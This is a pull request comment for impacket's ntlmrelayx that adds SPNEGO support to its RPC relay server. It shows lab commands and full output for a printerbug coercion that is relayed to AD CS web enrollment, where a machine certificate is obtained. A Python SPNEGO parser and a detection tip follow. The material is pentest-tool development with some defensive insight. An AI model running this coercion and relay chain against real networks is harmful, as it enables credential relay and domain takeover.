@Romern Romern commented Feb 8, 2026

This pull request implements SPNEGO for the rpcrelayserver in ntlmrelayx.

This can be tested with printerbug, for example, by specifying a hostname of a computer account (else just straight NTLM is used):

$ nxc smb -u Administrator -p 'password!1' -d romern.lab -M coerce_plus --smb-timeout 20 -o METHOD=printerbug LISTENER=testcomputer -- 192.168.128.101
SMB         192.168.128.101 445    WIN11VM          [*] Windows 11 / Server 2025 Build 26100 x64 (name:WIN11VM) (domain:romern.lab) (signing:False) (SMBv1:None)
SMB         192.168.128.101 445    WIN11VM          [+] romern.lab\Administrator:password!1 (Pwn3d!)
COERCE_PLUS 192.168.128.101 445    WIN11VM          VULNERABLE, PrinterBug
$ ntlmrelayx.py -t http://192.168.128.100/certsrv/certfnsh.asp --adcs -smb2support --keep-relaying -debug --template 'Machine'
Impacket v0.14.0.dev0+20260205.104528.a023ef32 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /Users/roman/repos/impacket/impacket
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client DCSYNC loaded..
[+] Protocol Attack WINRMS loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
[*] Setting up MSSQL Server on port 1433
[*] Setting up RDP Server on port 3389
[*] Multirelay disabled

[*] Servers started, waiting for connections
[+] Callback added for UUID 99FCFEC4-5260-101B-BBCB-00AA0021347A V:0.0
[+] Callback added for UUID E1AF8308-5D1F-11C9-91A4-08002B14A0FA V:3.0
[+] (RPC): Received packet of type MSRPC BIND
[+] (RPC): Answering to a BIND without authentication
[+] (RPC): Received packet of type MSRPC REQUEST
[+] (RPC): Sending packet of type MSRPC RESPONSE
[+] Callback added for UUID 99FCFEC4-5260-101B-BBCB-00AA0021347A V:0.0
[+] Callback added for UUID E1AF8308-5D1F-11C9-91A4-08002B14A0FA V:3.0
[+] (RPC): Received packet of type MSRPC BIND
[+] (RPC): Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[+] (RPC): Sending packet of type MSRPC BINDACK
[+] (RPC): Received packet of type MSRPC ALTERCTX
[*] (RPC): Received connection from 192.168.128.101, attacking target http://192.168.128.100
[+] (RPC): Sending packet of type MSRPC ALTERCTX R
[+] (RPC): Received packet of type MSRPC ALTERCTX
[*] HTTP server returned error code 200, treating as a successful login
[*] (RPC): Authenticating connection from ROMERN/WIN11VM$@192.168.128.101 against http://192.168.128.100 SUCCEED [1]
[+] (RPC): Sending packet of type MSRPC FAULT
[*] http://ROMERN/WIN11VM$@192.168.128.100 [1] -> Generating CSR...
[*] http://ROMERN/WIN11VM$@192.168.128.100 [1] -> CSR generated!
[*] http://ROMERN/WIN11VM$@192.168.128.100 [1] -> Getting certificate...
[*] http://ROMERN/WIN11VM$@192.168.128.100 [1] -> GOT CERTIFICATE! ID 7
[*] http://ROMERN/WIN11VM$@192.168.128.100 [1] -> Writing PKCS#12 certificate to ./WIN11VM.pfx
[*] http://ROMERN/WIN11VM$@192.168.128.100 [1] -> Certificate successfully written to file
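The log above shows the relay server receiving a BIND whose SPNEGO token leads with Kerberos ("Unsupported MechType 'MS KRB5'"), answering with a BINDACK that selects NTLMSSP, and then completing the NTLM exchange over ALTERCTX. The stdlib-only Python below is an added example, not impacket's code: it builds a SPNEGO NegTokenInit the way a client does, lists the mechanisms it offers, and applies the server-side selection rule to show why the client's optimistic Kerberos mechToken is discarded and a further round trip is needed. The `select_mechanism` helper, the `build_neg_token_resp` encoder and the placeholder AP-REQ bytes are assumptions for illustration and simplify what a real SPNEGO acceptor does.

```python
# Added example (not impacket's code): stdlib-only SPNEGO NegTokenInit inspector.
# Builds the token a client sends, lists the offered mechanisms, and applies a
# simplified server-side selection rule (assumption, not impacket's logic).

OID_SPNEGO = "1.3.6.1.5.5.2"
OID_MS_KRB5 = "1.2.840.48018.1.2.2"
OID_KRB5 = "1.2.840.113554.1.2.2"
OID_NTLMSSP = "1.3.6.1.4.1.311.2.2.10"
MECH_NAMES = {
    OID_MS_KRB5: "MS KRB5 - Microsoft Kerberos 5",
    OID_KRB5: "KRB5 - Kerberos 5",
    OID_NTLMSSP: "NTLMSSP - Microsoft NTLM Security Support Provider",
}

def _der_length(n):
    """DER length octets: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b

def der(tag, body):
    """Wrap body in a DER TLV with the given tag byte."""
    return bytes([tag]) + _der_length(len(body)) + body

def encode_oid(dotted):
    """Dotted OID string -> DER OBJECT IDENTIFIER (base-128 arcs)."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return der(0x06, bytes(out))

def decode_oid(body):
    """DER OBJECT IDENTIFIER contents -> dotted string."""
    arcs = [body[0] // 40, body[0] % 40]
    val = 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))

def read_tlv(buf, pos=0):
    """Return (tag, contents, next_pos) for the TLV starting at pos."""
    tag, pos = buf[pos], pos + 1
    length, pos = buf[pos], pos + 1
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def build_neg_token_init(mechs, mech_token=b""):
    """InitialContextToken: [APPLICATION 0] { SPNEGO OID, [0] NegTokenInit }."""
    mech_list = der(0x30, b"".join(encode_oid(m) for m in mechs))   # MechTypeList
    fields = der(0xA0, mech_list)                                    # mechTypes [0]
    if mech_token:
        fields += der(0xA2, der(0x04, mech_token))                   # mechToken [2]
    return der(0x60, encode_oid(OID_SPNEGO) + der(0xA0, der(0x30, fields)))

def parse_neg_token_init(token):
    """Extract mechTypes and the optimistic mechToken from an InitialContextToken."""
    tag, body, _ = read_tlv(token)
    if tag != 0x60:
        raise ValueError("not a GSS InitialContextToken")
    tag, oid_body, pos = read_tlv(body)
    if tag != 0x06 or decode_oid(oid_body) != OID_SPNEGO:
        raise ValueError("not SPNEGO")
    tag, neg, _ = read_tlv(body, pos)
    if tag != 0xA0:
        raise ValueError("not a NegTokenInit")
    _, seq, _ = read_tlv(neg)
    result = {"mechTypes": [], "mechToken": None}
    pos = 0
    while pos < len(seq):
        tag, field, pos = read_tlv(seq, pos)
        if tag == 0xA0:                      # mechTypes: SEQUENCE OF OID
            _, lst, _ = read_tlv(field)
            p = 0
            while p < len(lst):
                _, oid_body, p = read_tlv(lst, p)
                result["mechTypes"].append(decode_oid(oid_body))
        elif tag == 0xA2:                    # mechToken: OCTET STRING
            _, result["mechToken"], _ = read_tlv(field)
    return result

def offered_mechanisms(token):
    """Human-readable names of the mechanisms the client offers, in preference order."""
    return [MECH_NAMES.get(o, o) for o in parse_neg_token_init(token)["mechTypes"]]

def select_mechanism(token, supported):
    """Simplified acceptor rule (assumption): first offered mech the server supports.
    Returns (chosen_oid, downgraded); downgraded means the client's optimistic
    mechToken is useless and the client must send a fresh token for the chosen mech."""
    mechs = parse_neg_token_init(token)["mechTypes"]
    for oid in mechs:
        if oid in supported:
            return oid, oid != mechs[0]
    return None, False

def build_neg_token_resp(supported_mech, neg_state=1):
    """[1] NegTokenResp { negState [0] ENUMERATED, supportedMech [1] OID }; 1 = accept-incomplete."""
    body = der(0xA0, der(0x0A, bytes([neg_state]))) + der(0xA1, encode_oid(supported_mech))
    return der(0xA1, der(0x30, body))

if __name__ == "__main__":
    # Constructed sample: Kerberos-first list with a placeholder AP-REQ, as a domain-joined client would send.
    sample = build_neg_token_init([OID_MS_KRB5, OID_KRB5, OID_NTLMSSP], b"<constructed AP-REQ placeholder>")
    for name in offered_mechanisms(sample):
        print("offered:", name)
    chosen, downgraded = select_mechanism(sample, {OID_NTLMSSP})
    print("server picks:", MECH_NAMES[chosen], "| downgraded from client's preference:", downgraded)
```

From a defender's perspective the interesting pattern is exactly this one: a client that leads its mechTypes list with Kerberos and is answered by an acceptor that picks NTLMSSP. Genuine services that support Kerberos pick the optimistic mechanism and never need the extra leg, so a NegTokenResp selecting NTLMSSP against a Kerberos-first NegTokenInit, visible in the BIND/BINDACK/ALTERCTX sequence above, is the negotiation fingerprint worth alerting on in RPC, SMB and HTTP traffic.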
